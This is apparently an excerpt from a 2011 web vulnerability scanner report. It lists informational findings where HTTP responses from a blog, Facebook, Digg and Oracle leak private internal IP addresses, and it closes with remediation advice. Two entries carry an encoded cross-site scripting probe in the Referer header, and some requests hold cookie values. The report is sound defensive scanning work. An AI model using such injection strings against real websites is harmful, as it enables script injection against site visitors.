There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


23.1. http://blog.ulf-wendel.de/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.ulf-wendel.de
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:18 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<pre>
[myapp]
master[]=localhost:/tmp/mysql.sock
slave[]=192.168.2.27:3306
pick[]=random_once
</pre>
...[SNIP]...
<pre>
[myapp]
master[]=localhost:/tmp/mysql.sock
slave[]=192.168.2.27:3306
</pre>
...[SNIP]...
<pre>
[myapp]
master[]=localhost:/tmp/mysql.sock
slave[]=192.168.2.27:3306
trx_stickiness=master
</pre>
...[SNIP]...
rom the configuration file &quot;mysqlnd_ms_repl_setup.ini&quot; could also read &quot; [&quot; host_or_ip_used_so_far]&quot; Let&#8217;s assume that your forum had been configured to connect to &quot;192.168.2.12&quot; before you started with replication. Try this config&#8230;<br />
...[SNIP]...
<pre>
[192.168.2.12]
master[] = master.mynetwork
slave[] = slave_1.mynetwork
slave[] = slave_2.mynetwork
</pre>
...[SNIP]...

23.2. http://code.openark.org/blog/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.openark.org
Path:   /blog/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /blog/ HTTP/1.1
Host: code.openark.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://code.openark.org/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<strong>'10.0.0.3'</strong>
...[SNIP]...
<strong>'temp'@'10.0.0.3'</strong>
...[SNIP]...

23.3. http://developers.facebook.com/plugins/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.195.105
Connection: close
Date: Tue, 06 Sep 2011 17:06:31 GMT
Content-Length: 0


23.4. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
<span title="10.2.130.26 Build: 264 - Fri Sep 2 18:08:38 PDT 2011 13.57ms">
...[SNIP]...

23.5. http://search.oracle.com/search/js/resources/TranslationElements_en11_1_1_0_0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.oracle.com
Path:   /search/js/resources/TranslationElements_en11_1_1_0_0.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search/js/resources/TranslationElements_en11_1_1_0_0.js HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=94577a1c1e6c366bc46e69bb4867b280b00dd079463a; ses.qapp.sg_tab_name=Oracle+OpenWorld; s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D; BIGipServerses_ext_prod_pool=477779860.30494.0000

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 16 Apr 2011 22:25:19 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (H;max-age=150+0;age=54;ecid=231317025266,0)
Content-Length: 11225
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:23 GMT
Connection: close

/* $Header: search/sample_src/query/js/resources/TranslationElements_en.js st_search_leiwang_bug-9859003/2 2010/06/30 11:08:22 leiwang Exp $ */
/* Copyright (c) 2007, 2010, Oracle and/or its affiliate
...[SNIP]...
xlf
mture 01/25/08 - 6374161: add 'Hide Similar Documents'
mture 09/06/07 - 6377959: 'No cluster information available...'
mture 08/30/07 - additional messages for end of 10.1.8.2 development
mture 08/08/07 - add 'From x to y' message
mture 07/11/07 - fix 'Within the last' messages
mture 07/05/07 - add message for 'Unknown' and 'None'
mture
...[SNIP]...

23.6. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "dbfe7810d51b43160242bf8796785f1d"
X-FB-Server: 10.27.177.120
X-Cnection: close
Content-Length: 18454
Cache-Control: public, max-age=816
Expires: Tue, 06 Sep 2011 15:11:09 GMT
Date: Tue, 06 Sep 2011 14:57:33 GMT
Connection: close
Vary: Accept-Encoding

/*1315233047,169587064,JIT Construction: v434551,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.7. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=17582a7e8baf4c60a804e1226949063d&extern=0&channel=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15837856%2Fsite%2F14081545%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.80.47
X-Cnection: close
Date: Tue, 06 Sep 2011 14:57:59 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

23.8. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=57345927025&app_id=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc60f4ba8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cb50af8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31d2c4284%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd66cbd98%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273fd1124%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.53
X-Cnection: close
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=fd66cbd98&origin=http\u00253A\u00252F\u00252Fwww.readwriteweb.com\u00252Ff27c152a9&relation=parent&transport=postmessage&frame=f1fd77541", "http:
...[SNIP]...

23.9. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=a95b455141f1c76d40987560fb514c1a&app_id=a95b455141f1c76d40987560fb514c1a&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d5a6e14%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21922ca3%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3209f06ac%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df84581864%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18bb9d1e4%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.42.47
X-Cnection: close
Date: Tue, 06 Sep 2011 15:32:56 GMT
Content-Length: 248

<script type="text/javascript">
parent.postMessage("cb=f84581864&origin=http\u00253A\u00252F\u00252Fwww.readwriteweb.com\u00252Ff27c152a9&relation=parent&transport=postmessage&frame=fb1ef197", "http:\
...[SNIP]...

23.10. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx?ba088 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.119.27
X-Cnection: close
Date: Tue, 06 Sep 2011 16:53:41 GMT
Content-Length: 9048

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="Xzj2";</scri
...[SNIP]...

23.11. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx&width=320&height=236&header=false&colorscheme=light&font=arial&border_color=%23ffffff&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.54
X-Cnection: close
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Length: 9560

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="kv9c";</scri
...[SNIP]...

23.12. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx&send=false&layout=button_count&width=140&show_faces=true&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.32
X-Cnection: close
Date: Tue, 06 Sep 2011 16:45:44 GMT
Content-Length: 23326

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.13. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://blogs.oracle.com/oracleopenworld/entry/sting_q_a_part_two&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.230.52
X-Cnection: close
Date: Tue, 06 Sep 2011 15:56:52 GMT
Content-Length: 23308

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.14. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://blogs.oracle.com/oracleopenworld/entry/intelligent_performance&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.49
X-Cnection: close
Date: Tue, 06 Sep 2011 15:56:52 GMT
Content-Length: 23309

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.15. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd910adb4%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.18.46
X-Cnection: close
Date: Tue, 06 Sep 2011 15:33:04 GMT
Content-Length: 26027

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.16. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx?ba088 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.109.55
X-Cnection: close
Date: Tue, 06 Sep 2011 16:53:40 GMT
Content-Length: 25166

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.17. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?http://blogs.oracle.com/oracleopenworld/entry/the_curious_case_of_identity&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.227.37
X-Cnection: close
Date: Tue, 06 Sep 2011 15:56:52 GMT
Content-Length: 23259

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.18. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?http://blogs.oracle.com/oracleopenworld/entry/the_curious_case_of_identity&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
